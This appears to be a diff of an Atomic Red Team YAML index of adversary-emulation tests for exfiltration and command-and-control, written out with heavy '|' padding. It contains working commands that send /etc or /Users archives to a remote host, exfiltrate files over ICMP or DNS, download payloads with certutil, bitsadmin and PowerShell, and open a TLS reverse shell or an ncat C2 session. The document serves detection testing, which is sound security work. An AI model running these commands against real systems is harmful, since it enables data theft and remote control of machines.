- name: Compress Data and lock with password for Exfiltration with 7zip
|
|
|
|
|
description: 'Note: Requires 7zip installation
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -28135,7 +28239,7 @@ exfiltration:
|
|
|
|
|
- name: Data Transfer Size Limits
|
|
|
|
|
description: 'Take a file/directory, split it into 5Mb chunks
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -28226,7 +28330,7 @@ exfiltration:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Exfiltration Over Alternative Protocol - SSH
|
|
|
|
|
description: |
|
|
|
|
|
Input a domain and test Exfiltration over SSH
|
|
|
|
@@ -28256,7 +28360,7 @@ exfiltration:
|
|
|
|
|
command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh
|
|
|
|
|
#{user_name}@#{domain} ''cat > /Users.tar.gz.enc''
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Exfiltration Over Alternative Protocol - HTTP
|
|
|
|
|
description: |
|
|
|
|
|
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
|
|
|
|
@@ -28304,11 +28408,11 @@ exfiltration:
|
|
|
|
|
in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}",
|
|
|
|
|
1500, $Data) }
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Exfiltration Over Alternative Protocol - DNS
|
|
|
|
|
description: 'Exfiltration of specified file over DNS protocol.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -28454,7 +28558,7 @@ command-and-control:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'export #{proxy_scheme}_proxy=#{proxy_server}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
unset http_proxy
|
|
|
|
|
unset https_proxy
|
|
|
|
@@ -28550,7 +28654,7 @@ command-and-control:
|
|
|
|
|
- name: Base64 Encoded data.
|
|
|
|
|
description: 'Utilizing a common technique for posting base64 encoded data.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -28631,7 +28735,7 @@ command-and-control:
|
|
|
|
|
and using this to maintain access to the machine. Download of TeamViewer installer
|
|
|
|
|
will be at the destination location when sucessfully executed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -28691,7 +28795,7 @@ command-and-control:
|
|
|
|
|
- name: rsync remote file copy (push)
|
|
|
|
|
description: 'Utilize rsync to perform a remote file copy (push)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -28716,11 +28820,11 @@ command-and-control:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: rsync remote file copy (pull)
|
|
|
|
|
description: 'Utilize rsync to perform a remote file copy (pull)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -28745,11 +28849,11 @@ command-and-control:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: scp remote file copy (push)
|
|
|
|
|
description: 'Utilize scp to perform a remote file copy (push)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -28774,11 +28878,11 @@ command-and-control:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: scp remote file copy (pull)
|
|
|
|
|
description: 'Utilize scp to perform a remote file copy (pull)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -28803,11 +28907,11 @@ command-and-control:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: sftp remote file copy (push)
|
|
|
|
|
description: 'Utilize sftp to perform a remote file copy (push)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -28832,11 +28936,11 @@ command-and-control:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}''
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: sftp remote file copy (pull)
|
|
|
|
|
description: 'Utilize sftp to perform a remote file copy (pull)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -28861,12 +28965,12 @@ command-and-control:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: certutil download (urlcache)
|
|
|
|
|
description: 'Use certutil -urlcache argument to download a file from the web.
|
|
|
|
|
Note - /urlcache also works!
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -28883,12 +28987,12 @@ command-and-control:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: certutil download (verifyctl)
|
|
|
|
|
description: 'Use certutil -verifyctl argument to download a file from the web.
|
|
|
|
|
Note - /verifyctl also works!
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -28933,7 +29037,7 @@ command-and-control:
|
|
|
|
|
command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority
|
|
|
|
|
HIGH #{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - PowerShell Download
|
|
|
|
|
description: |
|
|
|
|
|
This test uses PowerShell to download a payload.
|
|
|
|
@@ -28954,15 +29058,15 @@ command-and-control:
|
|
|
|
|
command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}",
|
|
|
|
|
"#{destination_path}")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: OSTAP Worming Activity
|
|
|
|
|
description: 'OSTap copies itself in a specfic way to shares and secondary drives.
|
|
|
|
|
This emulates the activity.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -29111,7 +29215,7 @@ command-and-control:
|
|
|
|
|
"#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}"
|
|
|
|
|
-QuickTimeout}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: DNS Regular Beaconing
|
|
|
|
|
description: |
|
|
|
|
|
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
|
|
|
|
@@ -29203,7 +29307,7 @@ command-and-control:
|
|
|
|
|
- name: OSTap Payload Download
|
|
|
|
|
description: 'Uses cscript //E:jscript to download a file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -29223,7 +29327,7 @@ command-and-control:
|
|
|
|
|
cscript //E:Jscript #{script_file}
|
|
|
|
|
cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1032:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -29309,7 +29413,7 @@ command-and-control:
|
|
|
|
|
command: |
|
|
|
|
|
$server_ip = #{server_ip}
|
|
|
|
|
$server_port = #{server_port}
|
|
|
|
|
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port})
|
|
|
|
|
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}')
|
|
|
|
|
$stream = $socket.GetStream()
|
|
|
|
|
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
|
|
|
|
|
$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
|
|
|
|
@@ -29436,7 +29540,7 @@ command-and-control:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powercat C2
|
|
|
|
|
description: "Start C2 Session Using Powercat\nTo start the listener on a Linux
|
|
|
|
|
device, type the following: \nnc -l -p <port>\n"
|
|
|
|
@@ -29501,7 +29605,7 @@ command-and-control:
|
|
|
|
|
- name: Testing usage of uncommonly used port with PowerShell
|
|
|
|
|
description: 'Testing uncommonly used port utilizing PowerShell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -29518,11 +29622,11 @@ command-and-control:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'test-netconnection -ComputerName #{domain} -port #{port}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Testing usage of uncommonly used port
|
|
|
|
|
description: 'Testing uncommonly used port utilizing telnet.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -29540,7 +29644,7 @@ command-and-control:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'telnet #{domain} #{port}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1102:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -29607,7 +29711,7 @@ command-and-control:
|
|
|
|
|
- name: Reach out to C2 Pointer URLs via command_prompt
|
|
|
|
|
description: 'Download data from a public website using command line
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -29616,14 +29720,14 @@ command-and-control:
|
|
|
|
|
command: 'bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/
|
|
|
|
|
%TEMP%\bitsadmindownload.html
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del %TEMP%\bitsadmindownload.html >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Reach out to C2 Pointer URLs via powershell
|
|
|
|
|
description: 'Multiple download methods for files using powershell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
CircleCI Atomic Red Team doc generator